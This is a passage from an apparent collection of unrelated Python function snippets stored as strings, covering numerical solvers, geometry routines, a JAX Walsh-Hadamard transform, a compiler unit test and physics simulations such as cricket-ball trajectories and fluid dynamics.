XDMFFile(\"%s/pressure.xdmf\" % result)\n self.sfile = XDMFFile(\"%s/stress.xdmf\" % result)\n self.vfile.parameters[\"flush_output\"] = True\n self.ufile.parameters[\"flush_output\"] = True\n self.pfile.parameters[\"flush_output\"] = True\n self.sfile.parameters[\"flush_output\"] = True\n with open(result+'/data.csv', 'w') as data_file:\n writer = csv.writer(data_file, delimiter=';', lineterminator='\\n')\n writer.writerow(['time', 'mean pressure on outflow', 'pressure_jump', \n 'x-coordinate of end of beam', 'y-coordinate of end of beam',\n 'pressure difference', \n 'drag_circle', 'drag_fluid', 'drag_solid', 'drag_fullfluid',\n 'lift_circle', 'lift_fluid', 'lift_solid', 'lift_fullfluid'])", "def run(self):\n cpt = 1\n while cpt < (self.BOUND):\n cpt += 1\n self.incBound()\n\n res = self.s.check()\n if res == sat:\n m = self.s.model()\n self.checkModel(m)\n self.printModel(m)\n return\n else:\n print(\"The problem is UNSAT\")", "def nodal2D_steady_fixed_source(Dims,Lengths,BCs,D,Sigma,Q, tolerance=1.0e-12, phi_solution=0., LOUD=False, maxits=100):\n I = Dims[0]\n J = Dims[1]\n K = Dims[2]\n L = I*J*K\n Nx = Lengths[0]\n Ny = Lengths[1]\n Nz = Lengths[2]\n \n hx,hy,hz = np.array(Lengths)/np.array(Dims)\n ihx2,ihy2,ihz2 = (1.0/hx**2,1.0/hy**2,1.0/hz**2)\n\n if (type(phi_solution) != np.ndarray):\n phi_solution = np.zeros((2,I,J,5))\n phi_new = phi_solution.copy()\n iteration = 1\n converged = 0\n localBCs = np.ones((2,3))\n\n #reshape Q if necessary\n if Q.shape != (I,J,K,5):\n Q_new = np.zeros((I,J,K,5))\n Q_new[:,:,:,0] = Q[:,:,:]\n Q = Q_new\n\n #iterate over the x directions\n k=0\n while not(converged):\n \n #Solve for x direction\n d = 0 #solv direction\n tr_id = 1 #trans direction idx in array\n for j in range(J): #spatial loop over J coordinates\n for i in range(I): #spatial loop over X coordinates\n\n if not(i==0):\n phi_left = phi_solution[d,i-1,j,:]\n C = positive_current(phi_left,hx/2,hx,D[i-1,j,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[0,0:3] = [0.25,-D[i,j,k]/2,C]\n else:\n localBCs[0,:] = BCs[0,:].copy()\n localBCs[0,1] *= D[i,j,k]\n if not(i==(I-1)):\n phi_rt = phi_solution[d,i+1,j,:]\n C = negative_current(phi_rt,-hx/2,hx,D[i+1,j,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[1,0:3] = [.25,D[i,j,k]/2,C]\n else:\n localBCs[1,:] = BCs[1,:].copy()\n localBCs[1,1] *= D[i,j,k]\n \n #Compute transverse fluxes\n if i==0:\n nbr_ids = [i,i,i+1] #Assume constant along left edge\n elif i==(I-1):\n nbr_ids = [i-1,i,i] #assume constant along right edge\n else:\n nbr_ids = [i-1,i,i+1] #interior cell\n\n if not j==(J-1):\n top_phis = phi_solution[tr_id,nbr_ids,j,:]\n top_Ds = D[nbr_ids,j,k]\n Ltop_quad = transverse_leakage_dof(top_phis,hy/2.,hy,hx,top_Ds)\n else:\n top_phis = phi_solution[tr_id,nbr_ids,j,:]\n top_Ds = D[nbr_ids,j,k]\n Ltop_quad = transverse_leakage_dof(top_phis,hy/2.,hy,hx,top_Ds)\n #Ltop_quad = (0., 0, 0)\n\n if not j==0:\n bot_phis = phi_solution[tr_id,nbr_ids,j,:]\n bot_Ds = D[nbr_ids,j,k]\n Lbot_quad = transverse_leakage_dof(bot_phis,-hy/2.,hy,hx,bot_Ds)\n else:\n bot_phis = phi_solution[tr_id,nbr_ids,j,:]\n bot_Ds = D[nbr_ids,j,k]\n Lbot_quad = transverse_leakage_dof(bot_phis,-hy/2.,hy,hx,bot_Ds)\n #Lbot_quad = (0.,0,0)\n\n #Add leakages to the Q_local terms\n# print(\"\\n X Information for element: \",i,j)\n# print(\"\\nThe source is: \",Q[i,j,k,0])\n\n Q_local = np.array(Q[i,j,k,:])\n for dof in range(len(Ltop_quad)):\n Q_local[dof] -= 1/hy*(Ltop_quad[dof] - Lbot_quad[dof])\n\n# print(\"The transverse leakage magnitude is: \",-1./hy*(Ltop_quad[0] - Lbot_quad[0]))\n# print(\"Total RHS: \", Q_local[0], Q_local[1])\n\n #Compute the new x fluxes\n phi_new[0,i,j,:] = single_node1GVacuum(D[i,j,k],Sigma[i,j,k],Q_local,hx,localBCs)\n phi,a1,a2,a3,a4 = phi_new[0,i,j,:]\n# print(\"The reaction magnitude: \", phi_new[0,i,j,0]*Sigma[i,j,k])\n# print(\"The current magnitude: \",1./hx*(current(phi_new[0,i,j,:],hx/2,hx,D[i,j,k]) - current(phi_new[0,i,j,:],-hx/2,hx,D[i,j,k])))\n# print(\"\")\n\n #print(i,\"incoming current on left =\", localBCs[0,2],positive_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i>0):\n print(i,\"outgoing current on left =\", negative_current(phi_new[0,i-1,j,:],hx/2,hx,D[i-1,j,k]),\n negative_current(phi_new[0,i,j,:],-hx/2,hx,D[i,j,k]) )\n if 0*(i<I-1):\n print(i,\"outgoing current on right =\", positive_current(phi_new[0,i+1,j,:],-hx/2,hx,D[i+1,j,k]),\n positive_current(phi_new[0,i,j,:],hx/2,hx,D[i,j,k]) )\n #print(i,\"incoming current on right =\", localBCs[1,2],negative_current(phi_new[i,:],h/2,h,D[i]) )\n #print(\"zone \",i,\" current in at right:\",localBCs[1,2],\" current out at right:\",current_left)\n\n \n #Solve for y direction\n d = 1 #solv direction\n tr_id = 0 #trans direction idx in array\n for j in range(J): #spatial loop over J coordinates\n for i in range(I): #spatial loop over X coordinates\n\n if not(j==0):\n phi_left = phi_solution[d,i,j-1,:]\n C = positive_current(phi_left,hy/2,hy,D[i,j-1,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[0,0:3] = [0.25,-D[i,j,k]/2,C]\n else:\n localBCs[0,:] = BCs[2,:].copy()\n localBCs[0,1] *= D[i,j,k]\n if not(j==(J-1)):\n phi_rt = phi_solution[d,i,j+1,:]\n C = negative_current(phi_rt,-hy/2,hy,D[i,j+1,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[1,0:3] = [.25,D[i,j,k]/2,C]\n else:\n localBCs[1,:] = BCs[3,:].copy()\n localBCs[1,1] *= D[i,j,k]\n \n #Compute transverse fluxes\n if j==0:\n nbr_ids = [j,j,j+1] #Assume constant along left edge\n elif j==(J-1):\n nbr_ids = [j-1,j,j] #assume constant along right edge\n else:\n nbr_ids = [j-1,j,j+1] #interior cell\n\n if not i==(I-1):\n rgt_phis = phi_solution[tr_id,i,nbr_ids,:]\n rgt_Ds = D[i,nbr_ids,k]\n Lrgt_quad = transverse_leakage_dof(rgt_phis,hx/2.,hx,hy,rgt_Ds)\n# print(\"Leakage right\",Lrgt_quad)\n# print(\"Just the right leakage\",current(phi_solution[0,i,j,:],hx/2.,hx,D[i,j,k]))\n# print(\"Right outflow, inflow\",positive_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]),\n# negative_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]))\n else:\n rgt_phis = phi_solution[tr_id,i,nbr_ids,:]\n rgt_Ds = D[i,nbr_ids,k]\n Lrgt_quad = transverse_leakage_dof(rgt_phis,hx/2.,hx,hy,rgt_Ds)\n# print(\"Leakage right\",Lrgt_quad)\n# print(\"Just the right leakage\",current(phi_solution[0,i,j,:],hx/2.,hx,D[i,j,k]))\n# print(\"Right outflow, inflow\",positive_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]),\n# negative_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]))\n\n if not i==0:\n lft_phis = phi_solution[tr_id,i,nbr_ids,:]\n lft_Ds = D[i,nbr_ids,k]\n Llft_quad = transverse_leakage_dof(lft_phis,-hx/2.,hx,hy,lft_Ds)\n else:\n lft_phis = phi_solution[tr_id,i,nbr_ids,:]\n lft_Ds = D[i,nbr_ids,k]\n Llft_quad = transverse_leakage_dof(lft_phis,-hx/2.,hx,hy,lft_Ds)\n #Llft_quad = (0.,0,0)\n\n #Add leakages to the Q_local terms\n Q_local = np.array(Q[i,j,k,:])\n# print(\"\\n Y Information for element: \",i,j)\n# print(\"\\nThe source is: \",Q[i,j,k,0])\n for dof in range(len(Lrgt_quad)):\n Q_local[dof] -= 1/hx*(Lrgt_quad[dof] - Llft_quad[dof])\n# print(\"The transverse leakage magnitude is: \",-1./hx*(Lrgt_quad[0] - Llft_quad[0]))\n# print(\"Total RHS: \", Q_local[0], Q_local[1])\n\n phi_new[1,i,j,:] = single_node1GVacuum(D[i,j,k],Sigma[i,j,k],Q_local,hy,localBCs)\n# print(\"The reaction magnitude: \", phi_new[1,i,j,0]*Sigma[i,j,k])\n# print(\"The current magnitude: \",1./hy*(current(phi_new[1,i,j,:],hy/2,hy,D[i,j,k]) - current(phi_new[1,i,j,:],-hy/2,hy,D[i,j,k])))\n# print(\"\")\n phi,a1,a2,a3,a4 = phi_new[1,i,j,:]\n #print(i,\"incoming current on left =\", localBCs[0,2],positive_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i>0):\n print(i,\"outgoing current on left =\", negative_current(phi_new[i-1,:],h/2,h,D[i]),negative_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i<I-1):\n print(i,\"outgoing current on right =\", positive_current(phi_new[i+1,:],-h/2,h,D[i]),positive_current(phi_new[i,:],h/2,h,D[i]) )\n #print(i,\"incoming current on right =\", localBCs[1,2],negative_current(phi_new[i,:],h/2,h,D[i]) )\n #print(\"zone \",i,\" current in at right:\",localBCs[1,2],\" current out at right:\",current_left)\n\n# print(\"X solution\", phi_new[0,:,:,0])\n# print(\"Y solution\", phi_new[1,:,:,0])\n\n #Compute total change in x and y\n relchange = np.linalg.norm( np.reshape(phi_new-phi_solution, 5*I*J*K*2))/np.linalg.norm( np.reshape(phi_new, 5*I*J*K*2))\n reldiff = np.linalg.norm( np.reshape(phi_new[0,:,:,0] - phi_new[1,:,:,0], I*J*K)/np.linalg.norm( np.reshape(phi_new[0,:,:,0],I*J*K)) )\n converged = (relchange < tolerance) or (iteration >= maxits)\n if (LOUD):\n print(\"Iteration\",iteration,\": relative change total =\",relchange,\"relative difference X Y\",reldiff)\n iteration += 1 \n phi_solution = phi_new.copy()\n\n\n x = np.linspace(hx*.5,Nx-hx*.5,I)\n y = np.linspace(hy*.5,Ny-hy*.5,J)\n z = np.linspace(hz*.5,Nz-hz*.5,K)\n return x,y,z,phi_solution[0,:,:,0].reshape(I,J,1)#+phi_solution[1,:,:,0].reshape(I,J,1)))", "def find_loops(edges):\n check_regularity(edges)\n loops = []\n edges = edges[:]\n start_i = -1\n last_i = -1\n n = []\n while edges != []:\n if start_i == -1:\n e = edges[0]\n n = [e]\n del edges[0]\n start_i = n[-1][0]\n last_i = n[-1][1]\n else:\n ok = False\n for i, e in enumerate(edges):\n if e[0] == last_i:\n n.append(e)\n del edges[i]\n ok = True\n break\n elif e[1] == last_i:\n n.append((e[1], e[0]))\n del edges[i]\n ok = True\n break\n if not ok:\n if start_i == last_i:\n start_i = -1\n loops.append(n)\n else:\n raise Exception(\"Missing some boundary edge\")\n last_i = n[-1][1]\n if start_i == last_i:\n loops.append(n)\n else:\n raise Exception(\"Missing some boundary edge\")\n return loops", "def test_74_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} break; end{while} break; end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,474))", "def boundary_conditions(self):\n pass", "def check_boundary(self,x):\n b_cells = np.zeros(self.n_c)\n b_cells[self.n_C:] = 1\n vBC = b_cells[self.tris]\n considered_triangles = vBC.sum(axis=1) == 2\n add_extra = ((self.Angles*(1-vBC)>np.pi/2).T*considered_triangles.T).T\n if add_extra.any():\n I,J = np.nonzero(add_extra)\n for k,i in enumerate(I):\n j = J[k]\n xs = x[self.tris[i]]\n re = xs[np.mod(j-1,3)] - xs[np.mod(j+1,3)]\n re = re/np.linalg.norm(re)\n re = np.array([re[1],-re[0]])\n rpe = xs[j]\n x_new = 2*np.dot(xs[np.mod(j-1,3)]-rpe,re)*re + rpe\n x = np.vstack((x,x_new))\n self.n_c = x.shape[0]\n self._triangulate(x)\n self.assign_vertices()\n\n C = get_C_boundary(self.n_c,self.CV_matrix)\n #\n # #Remove extra cells\n # keep_mask = C[self.n_C:, :self.n_C].sum(axis=1)>0 #I'm assuming this is the same thing. This removes all boundary centroids that are not connected to at least one real centroid.\n # if keep_mask.any():\n # c_keep = np.nonzero(keep_mask)[0]\n # x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n # self.n_c = x.shape[0]\n # self._triangulate(x)\n # self.assign_vertices()\n #\n\n #Remove all boundary particles not connected to exactly two other boundary particles\n remove_mask = C[self.n_C:, self.n_C:].sum(axis=1)!=2\n if remove_mask.any():\n c_keep = np.nonzero(~remove_mask)[0]\n x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n self.n_c = x.shape[0]\n self._triangulate(x)\n self.assign_vertices()\n self.Angles = tri_angles(x, self.tris)\n #\n # remove_mask = C[self.n_C:, self.n_C:].sum(axis=1)==0\n # if remove_mask.any():\n # c_keep = np.nonzero(~remove_mask)[0]\n # x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n # self.n_c = x.shape[0]\n # self._triangulate(x)\n # self.assign_vertices()\n # self.Angles = tri_angles(x, self.tris)\n\n\n return x", "def conditions():\n pass", "def before_bounce(vx_0,vy_0,vz_0,wx,wy,wz):\r\n # We define all the constants that we need to use\r\n g = 32.2 # gravitational constant in ft/ sec^2 \r\n radius = 0.116 # of the cricket ball in ft\r\n\r\n # We use the following two constants to calculate the value of constant_1\r\n #weight = 0.344 lb\r\n #ro = 0.075 lb/ft**2\r\n constant = 0.00461 # ro*area/(2*m)\r\n\r\n # C_d and C_l are constants for calculating the values of k_D and k_L\r\n c_d = 0.4\r\n c_l = 0.116\r\n k_d = c_d * constant # (c_d*ro*area)/(2*m)\r\n k_l = c_l * constant # (c_l*ro*area)/(2*m)\r\n \r\n # the initial and final time\r\n t_0 = 0.0 #s\r\n t_f = 3.0\r\n\r\n # number of steps and value of h \r\n N = 1000\r\n h = (t_f-t_0)/N\r\n\r\n e = 0.32 # coefficient of restitution\r\n c = 0.1 # constant for moisture level in the ground ranging from 0 to 1\r\n eps = 10E-2 # error constant\r\n \r\n # the values of the initial position of the ball and its \r\n # x, y and z components\r\n x_0 = 1 #ft\r\n y_0 = 2 #ft\r\n z_0 = 7 #ft\r\n\r\n def f(r,t):\r\n \"\"\"\r\n Helper function for using the fourth-order Runge Kutta (RK-4) method on the \r\n second order differential equations which help plot the ball's trajectory in its\r\n x, y and z axes.\r\n \"\"\"\r\n x = r[0]\r\n y = r[2]\r\n z = r[4]\r\n vx = r[1]\r\n vy = r[3]\r\n vz = r[5]\r\n velocity = np.sqrt(vx**2+vy**2+vz**2)\r\n #if np.abs(z)>eps:\r\n velocity = np.sqrt((vx+c*radius*wy)**2+(vy-c*radius*wx)**2+(-e*vz)**2)\r\n \r\n # equations for a cricket ball in motion\r\n return np.array([vx, (-k_d*velocity*vx+k_l*(wy*vz-wz*vy)),\r\n vy, (-k_d*velocity*vy+k_l*(wz*vx-wx*vz)),\r\n vz,(-k_d*velocity*vz+k_l*(wz*vy-wy*vx)-g)], float)\r\n \r\n t_before = np.arange(t_0, t_f, h) #array of time \r\n x_before = [] \r\n y_before = []\r\n z_before = []\r\n r_before = np.array([x_0, vx_0, y_0, vy_0, z_0, vz_0], float)\r\n \r\n # Applies RK-4 for each value of the position and velocity components\r\n for t in t_before:\r\n if np.abs(r_before[4])>=eps and r_before[0] <= (60+eps): \r\n x_before.append(r_before[0])\r\n y_before.append(r_before[2])\r\n z_before.append(r_before[4])\r\n k1 = h * f(r_before, t)\r\n k2 = h * f(r_before + 0.5 * k1, t + 0.5 * h)\r\n k3 = h * f(r_before + 0.5 * k2, t + 0.5 * h)\r\n k4 = h * f(r_before + k3, t + h)\r\n r_before += (k1 + 2 * k2 + 2 * k3 + k4) / 6\r\n # sets the initial component values for after the bounce when z is 0\r\n x_f = r_before[0]\r\n y_f = r_before[2]\r\n z_f = r_before[4]\r\n vx_f = r_before[1]\r\n vy_f = r_before[3]\r\n vz_f = r_before[5]\r\n \r\n # Makes a 3-D plot of the x, y and z axes representing the ball before hitting\r\n # the ground\r\n plt.figure(1)\r\n plot1 = plt.axes(projection=\"3d\")\r\n plot1.plot3D(x_before,y_before,z_before,'blue')\r\n plot1.set_xlabel('x')\r\n plot1.set_ylabel('y')\r\n plot1.set_zlabel('z')\r\n plot1.set_title('Before Bounce')\r\n \r\n return x_f,y_f,z_f,vx_f,vy_f,vz_f,x_before,y_before,z_before", "def main():\n\n varList = {'beta': 6., 'convSpeed': 1.2, 'Mark': 0., 'axi': 1, 'acModes': 4, 'Nr': 801, 'Tf': 600., 'xf': 0.51}\n\n # Solve steady flame.\n # BC1: I have the attachment BC at r = 1, always\n # BC2: I need to set dF/dr = 0 at r = 0 iff Mark != 0\n [qMean, r, FMean] = steady_flame_area_FD3(varList['Mark'], varList['beta'], varList['axi'], varList['Nr'])\n r = r * varList['beta']\n\n # Calculate mean flame derivatives\n dFMeanDr = derivsnew.FD1_CT2_D(FMean, r[1] - r[0])\n d2FMeanDr2 = derivsnew.FD2_CT2_D(FMean, r[1] - r[0])\n\n #Apply BC smooth tip:\n if(varList['Mark']!=0.0):\n dFMeanDr[-1] = 0.0\n\n # Use correct number of points. Remember that the extrems need to be set depending on the BC!\n # The attach BC (first point) is always assumed to be true and removed from the vector list\n if(varList['Mark']==0):\n Nr = varList['Nr'] / 2\n dFMeanDr = dFMeanDr[1:]\n d2FMeanDr2 = d2FMeanDr2[1:]\n r = r[1:]\n # The smooth BC holds only if Mark!=0 (second derivatives appear): remove also the last point\n else:\n Nr = varList['Nr'] / 2 - 1\n dFMeanDr = dFMeanDr[1:-1]\n d2FMeanDr2 = d2FMeanDr2[1:-1]\n r = r[1:-1]\n\n # Calculate geometric values\n den = 1 + varList['beta'] * varList['beta'] * dFMeanDr * dFMeanDr\n dR = r[1] - r[0]\n # Set Nx equal to Nr for now.\n # The implementation is more complicated if they differ, and need to interpolate between values.\n Nx = Nr\n\n # Nonuniform grid spacing along x!\n # Nx = length(dx) has to hold.\n dx = np.empty(len(FMean) - 1)\n for ii in range(1, len(FMean)):\n dx[ii - 1] = FMean[ii] - FMean[ii - 1]\n\n [A, B, C, tau] = loadAcoustics(varList['xf'], varList['Tf'], varList['acModes'], varList['beta'])\n\n Matrix = buildMatrix(Nr, dR, varList['beta'], den, r, FMean, dFMeanDr, d2FMeanDr2, varList['Mark'], varList['acModes'], A,\n B, C, Nx, dx, tau, qMean, varList['convSpeed'])\n\n [d, W, V] = eigProblem.solveEigProb(Matrix)\n [dnew, Wnew, Vnew] = eigProblem.selectUnstable(d, W, V)\n\n print dnew / (2. * np.pi)", "def method2(automaton, level):\r\n\r\n old_bad_twin = automaton\r\n i = 1\r\n while i <= level:\r\n new_bad_twin = generate_bad_twin(old_bad_twin, i)\r\n c2 = condition_C2(new_bad_twin)\r\n c3 = condition_C3(new_bad_twin)\r\n if not(c2 or c3):\r\n good_twin = generate_good_twin(new_bad_twin)\r\n synchronized, ambiguous_transitions = synchronize_1(new_bad_twin, good_twin)\r\n c1 = condition_C1(ambiguous_transitions)\r\n if not c1:\r\n for src_name, dst_name in ambiguous_transitions:\r\n states = synchronized.get_states()\r\n if find_loops(states[dst_name], {src_name}):\r\n return i - 1\r\n old_bad_twin = new_bad_twin\r\n i += 1\r\n return True", "def boundary(self):\n answer = self.zero()\n for k, v in self.items():\n for idx, cube in enumerate(k):\n acc_dim = sum((cube_l.dimension for cube_l in k[:idx]))\n for i in range(cube.dimension):\n for epsilon in (0, 1):\n new_cube = cube.face(i, epsilon)\n new_k = k[:idx] + (new_cube,) + k[idx + 1:]\n sign_exp = (acc_dim + i + epsilon) % 2\n answer += answer.create({new_k: v * (-1)**sign_exp})\n return answer", "def equiangulate(self,x,mask):\n\n timeout = 100\n k = 0\n while (not mask.all())and(k<timeout):\n\n changed_tris,j = np.nonzero(~mask)\n chosen_cell = changed_tris[0]\n cell_mask = np.zeros(3,dtype=np.bool)\n cell_mask[j[0]] = True\n chosen_opposite_cell = self.v_neighbours[chosen_cell,cell_mask][0]\n\n\n cells = np.roll(self.tris[chosen_cell],-j[0])\n opposite_cells = self.tris[chosen_opposite_cell]\n opposite_cells = np.roll(opposite_cells, - self.k2s[chosen_cell,cell_mask])\n\n\n self.tris[chosen_cell] = cells[0], opposite_cells[0],cells[2]\n self.tris[chosen_opposite_cell] = opposite_cells[0],cells[0], opposite_cells[2]\n\n self.Angles[[chosen_cell,chosen_opposite_cell]] = tri_angles_periodic(x, self.tris[[chosen_cell,chosen_opposite_cell]], self.L)\n # self.Angles = tri_angles_periodic(x,self.tris,self.L)\n self.Cents = x[self.tris]\n self.vs = self.get_vertex_periodic()\n\n\n modify_neighbours = np.concatenate([self.v_neighbours[chosen_cell],self.v_neighbours[chosen_opposite_cell]])\n modify_neighbours.sort()\n self.v_neighbours[modify_neighbours] = -1\n\n\n n_neigh = get_neighbours(self.tris,self.v_neighbours,Range = modify_neighbours)\n self.v_neighbours = n_neigh\n self.neighbours = self.vs[n_neigh]\n\n self.k2s = get_k2(self.tris, self.v_neighbours)\n if (self.k2s>=3).sum()!=0:\n self._triangulate_periodic(x)\n self.k2s = get_k2(self.tris, self.v_neighbours)\n mask[:] = True\n else:\n mask = ((self.Angles[self.v_neighbours, self.k2s] + self.Angles) < np.pi)\n k+=1\n if k == timeout:\n self._triangulate_periodic(x)\n self.k2s = get_k2(self.tris, self.v_neighbours)", "def fwht(X):\n n = X.shape[0]\n # number of stages\n s = (n-1).bit_length()\n\n def init1():\n Y = jnp.empty(X.shape, dtype=X.dtype)\n A = X[0::2]\n B = X[1::2]\n Y = Y.at[0::2].set(A + B)\n Y = Y.at[1::2].set(A - B)\n return (Y, 1, 2, 4)\n\n def body1(state):\n # gap between x entries\n # number of x entries\n X, count, gap, step = state\n Y = jnp.empty(X.shape, dtype=X.dtype)\n J = 0\n k = 0\n def body2(state):\n Y, J, k = state\n def body3(state):\n Y, j, k = state\n # compute the four parts\n a = X[j]\n b = X[j+gap]\n c = X[j+1]\n d = X[j+1+gap]\n Y = Y.at[k].set(a+b)\n Y = Y.at[k+1].set(a-b)\n Y = Y.at[k+2].set(c-d)\n Y = Y.at[k+3].set(c+d)\n return (Y, j+2, k+4)\n def cond3(state):\n j = state[1]\n return j < J+gap-1\n # the loop\n init3 = (Y, J, k)\n Y, j, k = lax.while_loop(cond3, body3, init3)\n return (Y, J + step, k)\n\n def cond2(state):\n k = state[2]\n return k < n - 1\n\n init2 = Y, J, 0\n Y, J, k = lax.while_loop(cond2, body2, init2)\n\n return (Y, count+1, 2*gap, 2*step)\n\n def cond1(state):\n count = state[1]\n return count < s\n\n state = lax.while_loop(cond1, body1, init1())\n return state[0]", "def conditional_wegstein(f, x0):\n g0, condition = f(x0)\n g1 = x1 = g0\n w = np.ones_like(x0)\n np_abs = np.abs\n while condition:\n try: g1, condition = f(x1)\n except:\n x1 = g1\n g1, condition = f(x1)\n dx = x1-x0\n dummy = dx-g1+g0\n mask = np_abs(dummy) > 1e-16\n w[mask] = dx[mask]/dummy[mask]\n x0 = x1\n g0 = g1\n x1 = w*g1 + (1.-w)*x1", "def run(self):\n i = 0\n try:\n for i in range(0, self._iters):\n if self._verbose:\n print(\" Inner CG Iteration \" + repr(i))\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k, alpha_k,\n self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n if self._verbose:\n print(\"Converged at Iteration \" + str(i) + \".\")\n self.converged = True\n self.iteration = i+1\n return\n\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n self._rho_k = rho_k_plus_1\n\n if self._verbose >= 3:\n print(\" Residual=\" + repr(rho_k_t))\n except KeyboardInterrupt:\n raise\n finally:\n self.iteration = i+1", "def test_v_bounds(self):\n n = 50\n t_max = 100.0\n dt = 0.1\n\n G = StudentLayer(n)\n G.i_ext_init = np.linspace(-1.0, 1.0, n)\n\n class BoundsChecker(object):\n def __init__(self, target):\n self.target = target\n self.small = None\n self.large = None\n self.order = 1\n\n def evolve(self, t, dt):\n small = np.min(self.target.v)\n large = np.max(self.target.v)\n if self.small is None or self.small > small:\n self.small = small\n if self.large is None or self.large < large:\n self.large = large\n \n M = BoundsChecker(G)\n\n sim = simulation.Simulation(G, M, dt=dt)\n sim.run(t_max)\n\n self.assertLess(M.large, G.v_th)", "def InitialCondition():\n maxX = getX(C.N + 1,C.N+1,C.alpha_max)\n y0 = np.zeros(maxX,dtype=complex)\n for i in range(0, C.N+2):\n for j in range(0, C.N+2):\n for alpha in [1]:\n\n X = getX(i, j, alpha)\n\n y0[X] = 1./2./C.N * (1-delta(i, C.N+1))*(1-delta(j, C.N+1))+1./2*delta(i, C.N+1)*delta(j, C.N+1) +\\\n 1./2./(C.N)**0.5 * ((1-delta(i, C.N+1)) *\n delta(j, C.N+1)+(1-delta(j, C.N+1))*delta(i, C.N+1))", "def MLE_procedure(func, bounds):\n return differential_evolution(func, bounds)", "def solve_euler(Npts, IC, tout, Ca = 0.7, lagrangian=False, HLLC=True):\n # Setup up the grid\n stencil = 2\n \n xe = np.linspace(0.0, 1.0, Npts+1)\n xc = 0.5*(xe[1:] + xe[:-1])\n\n def boundary(xc, Q):\n # Add periodic boundaries to Q\n Qb = np.empty([Npts+2*stencil, NHYDRO])\n Qb[stencil:-stencil] = Q\n Qb[ :stencil] = Qb[Npts:Npts+stencil]\n Qb[-stencil:] = Qb[stencil:2*stencil]\n\n # Add periodic boundaries for cell centres and compute interfaces\n xc_b = np.empty(Npts+2*(stencil+1))\n xc_b[(stencil+1):-(stencil+1)] = xc\n xc_b[ :(stencil+1)] = xc[-(stencil+1):] - 1\n xc_b[-(stencil+1):] = xc[ :(stencil+1)] + 1\n\n xe = 0.5*(xc_b[1:] + xc_b[:-1])\n xc_b = xc_b[1:-1]\n\n return xc_b, xe, Qb\n\n def RK2_prim(xc_in, Q, dt):\n #1. Apply Boundaries\n xc, xe, Qb = boundary(xc_in, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #2. Compute Primitive variables\n Ub = Qb / dx\n Wb = cons2prim(Ub)\n\n #3. Compute gradients\n grad = compute_gradients(xc, xe, Wb)\n\n #4. Set interface velocities:\n if lagrangian:\n vc = Wb[:,1].copy()\n else:\n vc = np.zeros_like(Wb[:,1])\n f = (xe[1:-1] - xc[:-1]) / (xc[1:]-xc[:-1])\n vf = f*vc[1:] + (1-f)*vc[:-1]\n\n #5. Compute edge states:\n Wp = Wb[1:-1] + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Wb[1:-1] + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #6. Compute first fluxes:\n if HLLC:\n flux_0 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_0 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #7. Move the mesh and compute new face locations:\n xc = xc_in + vc[stencil:-stencil]*dt\n xc, xe, _ = boundary(xc, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #8. Predict edge states at t+dt\n # 8a. First predict the mid-points at t+dt\n dWdt = compute_time_diff_W(Wb[1:-1], grad, vc[1:-1]) \n Ws0 = Wb[1:-1] + dt*dWdt\n Ws = Wb[1:-1] + dt*dWdt\n\n # 8b. Apply the drag forces using Exponential Euler method\n rho = Ws[:,0] + FB*Ws[:,3]\n \n v_com = (Ws[:,0]*Ws[:,1] + FB*Ws[:,3]*Ws[:,4])/rho\n dV = (Wb[1:-1,4] - Wb[1:-1,1]) * np.exp(-K*rho*dt) \n da = (dWdt[:,4] - dWdt[:,1]) *-np.expm1(-dt*K*rho)/(K*rho)\n\n Ws[:,1] = v_com - FB*Ws[:,3]*(dV + da)/rho\n Ws[:,4] = v_com + Ws[:,0]*(dV + da)/rho\n \n # Heating due to drag\n dEk = 0.5*(Ws[:,0]*Ws[:,1]**2 - Ws0[:,0]*Ws0[:,1]**2 +\n Ws[:,3]*Ws[:,4]**2 - Ws0[:,3]*Ws0[:,4]**2)\n Ws[:,2] -= dEk * (GAMMA-1)\n \n # 8c. Reconstruct the edge states\n Wp = Ws + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Ws + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #9. Compute second fluxes\n if HLLC:\n flux_1 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_1 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #10. Compute the drag terms using 2nd order exponential Runge-Kutta method.\n f_g0 = -np.diff(flux_0[:,1]) ; f_g1 = -np.diff(flux_1[:,1])\n f_d0 = -np.diff(flux_0[:,4]) ; f_d1 = -np.diff(flux_1[:,4])\n\n Qn = Q - 